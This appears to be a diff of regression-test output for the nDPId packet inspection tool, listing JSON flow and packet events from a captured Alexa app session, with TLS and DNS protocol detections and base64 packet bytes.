-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2001,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976130073,"flow_last_seen":1490976130073,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976130073,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2001,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1490976130073,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976130073,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8j51AAEAGf0qsECrYNu8d\/Z+gAbt6Gf6DAAAAAKAC\/\/+QHQAAAgQFtAQCCAoA9nEeAAAAAAEDAwg="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2002,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1490976130307,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976130307,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAww\/RAAOcGo\/427x39rBAq2AG7n6DOZIqUehn+hHASH\/7FQwAAAgQFtAEDAwY="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2003,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_packet_id":3,"flow_last_seen":1490976130308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976130308,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoj55AAEAGf12sECrYNu8d\/Z+gAbt6Gf6EzmSKlVAQAVcPtQAA"} 
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2004,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976130073,"flow_last_seen":1490976130310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976130310,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2005,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976130073,"flow_last_seen":1490976130469,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976130469,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
+00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1941,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976115905,"flow_last_seen":1490976115905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976115905,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1941,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1490976115905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976115905,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JUVAAEAG7uusECrYNu8YtJKvAbsZEE7TAAAAAKAC\/\/+4mQAAAgQFtAQCCAoA9muWAAAAAAEDAwg="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976116084,"flow_last_seen":1490976116084,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976116084,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1490976116084,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976116084,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8uXBAAEAGWsCsECrYNu8YtJKwAbtgAdLYAAAAAKAC\/\/\/tjwAAAgQFtAQCCAoA9muoAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1943,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_packet_id":2,"flow_last_seen":1490976116119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976116119,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwcfNAAOcG+0g27xi0rBAq2AG7kq+qRjf5GRBO1HASH\/5e8QAAAgQFtAEDAwY="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1944,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_packet_id":3,"flow_last_seen":1490976116121,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976116121,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJUZAAEAG7v6sECrYNu8YtJKvAbsZEE7UqkY3+lAQAVepYgAA"} 
+00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1945,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976115905,"flow_last_seen":1490976116122,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976116122,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1946,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_packet_id":2,"flow_last_seen":1490976116248,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976116248,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwirZAAOcG4oU27xi0rBAq2AG7krCs\/eb6YAHS2XASH\/7iQAAAAgQFtAEDAwY="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1947,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_packet_id":3,"flow_last_seen":1490976116249,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976116249,"pkt":"AMDKkaPvePiC0\/vCCABFAAAouXFAAEAGWtOsECrYNu8YtJKwAbtgAdLZrP3m+1AQAVcssgAA"} 
+00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1969,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976115905,"flow_last_seen":1490976118335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":933,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1490976118335,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2001,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976130073,"flow_last_seen":1490976130073,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976130073,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2001,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1490976130073,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976130073,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8j51AAEAGf0qsECrYNu8d\/Z+gAbt6Gf6DAAAAAKAC\/\/+QHQAAAgQFtAQCCAoA9nEeAAAAAAEDAwg="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2002,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1490976130307,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976130307,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAww\/RAAOcGo\/427x39rBAq2AG7n6DOZIqUehn+hHASH\/7FQwAAAgQFtAEDAwY="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2003,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_packet_id":3,"flow_last_seen":1490976130308,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976130308,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoj55AAEAGf12sECrYNu8d\/Z+gAbt6Gf6EzmSKlVAQAVcPtQAA"} 
+00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2004,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976130073,"flow_last_seen":1490976130310,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976130310,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2005,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976130073,"flow_last_seen":1490976130469,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976130469,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2030,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976133936,"flow_last_seen":1490976133936,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1490976133936,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2030,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1490976133936,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1490976133936,"pkt":"AMDKkaPvePiC0\/vCCABFAABDWl9AAEARM1GsECrYrBAqARM4ADUALyGouR4BAAABAAAAAAAAA2VjeA1pbWFnZXMtYW1hem9uA2NvbQAAAQAB"} 00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2030,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976133936,"flow_last_seen":1490976133936,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1490976133936,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"ecx.images-amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2033,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_packet_id":2,"flow_last_seen":1490976134135,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":252,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":252,"pkt_l4_len":218,"thread_ts_msec":1490976134135,"pkt":"ePiC0\/vCAMDKkaPvCABFAADu5XxAAEARp4isECoBrBAq2AA1EzgA2tC0uR6BgAABAAkAAAAAA2VjeA1pbWFnZXMtYW1hem9uA2NvbQAAAQABwAwABQABAAAAMQAfDmQxZ2Uwa2sxbDVrbXMwCmNsb3VkZnJvbnQDbmV0AMAzAAEAAQAAADsABDRUPzjAMwABAAEAAAA7AAQ0VD8QwDMAAQABAAAAOwAENFQ\/PcAzAAEAAQAAADsABDRUPxrAMwABAAEAAAA7AAQ0VD\/swDMAAQABAAAAOwAENFQ\/I8AzAAEAAQAAADsABDRUP9\/AMwABAAEAAAA7AAQ0VD\/n"} 00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2033,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976133936,"flow_last_seen":1490976134135,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":124,"midstream":0,"thread_ts_msec":1490976134135,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4920,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"ecx.images-amazon.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.84.63.56"}} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2034,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134140,"flow_last_seen":1490976134140,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134140,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51985,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2034,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1490976134140,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134140,"pkt":"AMDKkaPvePiC0\/vCCABFAAA82ItAAEAGF7ysECrYNFQ\/OMsRAFDDaqo+AAAAAKAC\/\/9Q1AAAAgQFtAQCCAoA9nK1AAAAAAEDAwg="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2035,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134141,"flow_last_seen":1490976134141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134141,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51986,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2035,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1490976134141,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134141,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8xZVAAEAGKrKsECrYNFQ\/OMsSAFCeYrcjAAAAAKAC\/\/9o9QAAAgQFtAQCCAoA9nK2AAAAAAEDAwg="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2036,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134144,"flow_last_seen":1490976134144,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134144,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51987,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2036,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1490976134144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134144,"pkt":"AMDKkaPvePiC0\/vCCABFAAA85X5AAEAGCsmsECrYNFQ\/OMsTAFDQ0pfIAAAAAKAC\/\/9V3wAAAgQFtAQCCAoA9nK2AAAAAAEDAwg="} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2037,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134146,"flow_last_seen":1490976134146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134146,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2037,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1490976134146,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134146,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8TQZAAEAGo0GsECrYNFQ\/OMsUAFAHRT+wAAAAAKAC\/\/93hAAAAgQFtAQCCAoA9nK2AAAAAAEDAwg="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2038,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134148,"flow_last_seen":1490976134148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134148,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51989,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2038,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1490976134148,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134148,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8vDBAAEAGNBesECrYNFQ\/OMsVAFCK3c6GAAAAAKAC\/\/9lFAAAAgQFtAQCCAoA9nK2AAAAAAEDAwg="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2039,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976134149,"flow_last_seen":1490976134149,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976134149,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51990,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2039,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1490976134149,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134149,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8EjJAAEAG3hWsECrYNFQ\/OMsWAFAy6mCEAAAAAKAC\/\/8rCQAAAgQFtAQCCAoA9nK2AAAAAAEDAwg="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2040,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":123,"flow_packet_id":2,"flow_last_seen":1490976134198,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134198,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxXC1q1Wit3Oh6AScSCcZgAAAgQFtAQCCAps+npUAPZytgEDAwg="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2041,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":122,"flow_packet_id":2,"flow_last_seen":1490976134199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134199,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxSwmxNdB0U\/saAScSBYswAAAgQFtAQCCAps+nysAPZytgEDAwg="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2042,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":119,"flow_packet_id":2,"flow_last_seen":1490976134199,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976134199,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyxG999POw2qqP6AScSBjDwAAAgQFtAQCCAps+n3SAPZytQEDAwg="} 